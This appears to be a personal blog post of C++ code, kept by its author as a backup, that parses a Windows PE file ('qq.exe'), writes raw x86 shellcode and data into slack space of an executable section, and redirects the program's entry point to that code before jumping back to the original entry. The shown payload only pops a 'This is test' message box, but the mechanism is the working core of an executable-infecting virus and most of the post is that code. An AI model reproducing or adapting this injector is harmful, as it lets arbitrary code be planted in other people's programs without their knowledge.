Code resource ✵1

于 2016-03-31 21:59:56 发布
阅读量224 收藏
点赞数 
#include<Windows.h>
#include<iostream>
#include<fstream>
using namespace std;


BOOL  IsPeFile(LPVOID  ImageBase)   
//判断是否是PE文件结构
//首先检验文件头部的第一个字是否是PRIMAGE_DOS_SIGNATURE
//然后定位PE头,如果PE头符合IMAGE_NT_SIGNATURE则可以判断是有效的PE文件
//经过检验没有任何问题
{
 PIMAGE_DOS_HEADER  pDosHeader = NULL;
 PIMAGE_NT_HEADERS  pNtHeader  = NULL;

 if(!ImageBase)
  return FALSE;
 pDosHeader = (PIMAGE_DOS_HEADER) ImageBase;

 if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
  return FALSE  ;
 pNtHeader = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader+pDosHeader->e_lfanew);
 if(pNtHeader->Signature != IMAGE_NT_SIGNATURE )
  return  FALSE;
 return    TRUE;
}



PIMAGE_NT_HEADERS  GetNtHeader(LPVOID  ImageBase) //获取NT结构指针
//q1什么叫做NT结构指针
//即返回pNtHeader
{
 PIMAGE_DOS_HEADER  pDosHeader = NULL;
 PIMAGE_NT_HEADERS  pNtHeader  = NULL;

 if(!IsPeFile(ImageBase))
  return  NULL;
 pDosHeader = (PIMAGE_DOS_HEADER)ImageBase;
 pNtHeader = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader+pDosHeader->e_lfanew);
 return    pNtHeader;
}

//以下我们就要获取PE头结构的两个部分 FileHeader与Optionalheader  
PIMAGE_FILE_HEADER  WINAPI  GetFileHeader(LPVOID  Imagebase)
{
//为什么有个winapi
// 获取FileHeader

 PIMAGE_FILE_HEADER  pFileHeader;
 PIMAGE_NT_HEADERS  pNtHeader = NULL;
 pNtHeader = GetNtHeader(Imagebase);
 if(!pNtHeader)
  return  NULL;
 pFileHeader = & pNtHeader->FileHeader;
 return  pFileHeader;
}

PIMAGE_OPTIONAL_HEADER  GetOptionalHeader(LPVOID  ImageBase)
{
 PIMAGE_OPTIONAL_HEADER  pOptionHeader = NULL;
 PIMAGE_NT_HEADERS  pNtHeader = NULL;
 pNtHeader = GetNtHeader(ImageBase);
 if(!pNtHeader)
  return  NULL;
 pOptionHeader = & pNtHeader->OptionalHeader;
 return  pOptionHeader;
}

//将RVA地址转换为磁盘文件中的偏移
BOOL RvaToOffset(LPVOID lpMoudle,DWORD Rva)
{

 //定义变量存储转换后的偏移值和节表数
 DWORD FileOffset;
 WORD nSectionNum;

 //取NT结构头
 IMAGE_NT_HEADERS  *pNTHead;
 pNTHead=GetNtHeader(lpMoudle);
 nSectionNum=pNTHead->FileHeader.NumberOfSections;
 //NumberOfSections:定义PE文件Section的个数。如果对PE文件新增或删除Section的话,一定要记的修改此域。


 //取节表结构头(紧接在IMAGE_NT_HEADERS后面就是IMAGE_SECTION_HEADER)
 IMAGE_SECTION_HEADER *pSectionHead;
 pSectionHead=(IMAGE_SECTION_HEADER *)((DWORD)pNTHead+sizeof(IMAGE_NT_HEADERS));

 //循环比较Rva值所对应节表的偏移
 for(int i=0; i<nSectionNum; i++)
 {
  if((pSectionHead->VirtualAddress<=Rva) && (Rva<(pSectionHead->SizeOfRawData+pSectionHead->VirtualAddress)))
  {
   FileOffset=Rva-pSectionHead->VirtualAddress+pSectionHead->PointerToRawData;
   return FileOffset;
  }
  pSectionHead++;
 }
 return FALSE;
}

BOOL RvaToVirtualAddress(LPVOID lpMoudle,DWORD Rva)
{
 DWORD offect=RvaToOffset(lpMoudle,Rva);
 /*if(offect==NULL||offect==FALSE)
  return FALSE;*/
 return (DWORD)lpMoudle+offect;
}

//看到这里了------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------//3.23


VOID HandleSessionTable(LPVOID file,LPVOID base)
{
 char funcname[16]="MessageBoxA";
 char DLLname[16]="user32.dll";
 char Caption[16]="Warning";
 char Content[16]="This is test";
 DWORD LoadLibraryAAddr=0x1f864;
 DWORD GetProcAddress=0x24c46;

 char codes[]="\x60\xe8\x0\x0\x0\x0\x5f\x83\xef\x6\x8b\x4f\xf8\x8b"   //这里的数据就只插入代码
  "\x5f\xfc\x64\x8b\x15\x30\x0\x0\x0\x8b\x52\xc\x8b\x52\x1c\x8b"   //的二进制机器码
  "\x12\x8b\x42\x8\x8b\x42\x50\x3\xc8\x50\x8b\xd7\x83\xea\x38\x52"
  "\xff\xd1\x8b\xc8\x58\x3\xd8\x8b\xd7\x83\xea\x48\x52\x51\xff\xd3"
  "\x8b\xcf\x83\xe9\x18\x6a\x0\x51\x83\xe9\x10\x51\x6a\x0\xff\xd0\x61"
  "\xe9\x00\x00\x00\x00";


 int datalength=16*4+8;
 int codeslength=sizeof(codes)-1;

 IMAGE_NT_HEADERS *nthead=GetNtHeader(base);
 IMAGE_SECTION_HEADER *sessionhead=(IMAGE_SECTION_HEADER*)((DWORD)nthead+sizeof(IMAGE_NT_HEADERS));
 if(sessionhead->VirtualAddress==NULL)
  return;
 DWORD sessionnum=nthead->FileHeader.NumberOfSections;
 IMAGE_SECTION_HEADER *p=sessionhead;
 DWORD sFileSize=GetFileSize(base,NULL);
 for(int i=0;i<sessionnum;i++)
 {
  cout<<(char*)p->Name<<" " <<(int)p->SizeOfRawData-(int)p->Misc.VirtualSize<<endl;
  IMAGE_SECTION_HEADER tmp=sessionhead;
  memcpy(&tmp,p,sizeof(IMAGE_SECTION_HEADER));

  if((int)p->SizeOfRawData-(int)p->Misc.VirtualSize>codeslength+datalength&&\
   (p->Characteristics&IMAGE_SCN_MEM_EXECUTE))

   //看到这里了------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------//3.23
  {
   DWORD datavirtualbase=p->VirtualAddress+p->Misc.VirtualSize;
   DWORD datafileoffect=p->PointerToRawData+p->Misc.VirtualSize;
   SetFilePointer(file,datafileoffect,NULL,FILE_BEGIN);
   WriteFile(file,funcname,16,0,0);
   WriteFile(file,DLLname,16,0,0);
   WriteFile(file,Caption,16,0,0);
   WriteFile(file,Content,16,0,0);
   WriteFile(file,&LoadLibraryAAddr,4,0,0);
   WriteFile(file,&GetProcAddress,4,0,0);
   DWORD codevirtualbase=p->VirtualAddress+p->Misc.VirtualSize+datalength;
   DWORD cedefileoffset=p->PointerToRawData+p->Misc.VirtualSize+datalength;
   p->Misc.VirtualSize+=(codeslength+datalength);
   SetFilePointer(file,cedefileoffset,NULL,FILE_BEGIN);
   DWORD oldentry=nthead->OptionalHeader.AddressOfEntryPoint;
   DWORD JMPOffset=oldentry-(codevirtualbase+codeslength-5)-5;
   memcpy(codes+codeslength-4,&JMPOffset,sizeof(DWORD));
   nthead->OptionalHeader.AddressOfEntryPoint=codevirtualbase;
   DWORD writesize=0;
   SetFilePointer(file,cedefileoffset,NULL,FILE_BEGIN);
   if(!WriteFile(file,codes,codeslength,&writesize,0) )
   {
    TCHAR  *buffer;
    ::FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,GetLastError(),0,( LPTSTR )&buffer,0,NULL );
    MessageBox(0,buffer,L"ok",0);
   }
   cout<<"success"<<endl;
   break;

  }

  p++;
 }

}



void main()
{


 HANDLE  hFile = CreateFile(L"qq.exe",           // open  pe file
  GENERIC_READ|GENERIC_WRITE,              // open for reading
  NULL,           // share for reading
  NULL,                      // no security
  OPEN_EXISTING,             // existing file only
  FILE_ATTRIBUTE_NORMAL,   // normal file
  NULL);                     // no attr. template

 HANDLE hFileMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,NULL);
 if(!hFileMap )
 {
  TCHAR  *buffer ;



  ::FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,GetLastError(),0,( LPTSTR )&buffer,0,NULL );
  MessageBox(0,buffer,L"ok",0);
 }
 LPVOID  lpMemory = MapViewOfFile(hFileMap,FILE_MAP_READ|FILE_MAP_WRITE ,NULL,NULL,NULL);


 if(IsPeFile(lpMemory))
 {
  //AnalyzeNTHEADER(lpMemory);
  cout<<"yes"<<endl;
  IMAGE_NT_HEADERS *nthead=GetNtHeader(lpMemory);
  IMAGE_OPTIONAL_HEADER32 *image=GetOptionalHeader(lpMemory);
  cout<<"DataDirectory num:"<<image->NumberOfRvaAndSizes<<endl;




  HandleSessionTable(hFile,lpMemory);




 }
 else
  cout<<"no"<<endl;

 UnmapViewOfFile(lpMemory);
 CloseHandle(hFileMap);
 CloseHandle(hFile);


 system("pause");
}

以上内容纯属自己用来备份用的

GreenHandX1H
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值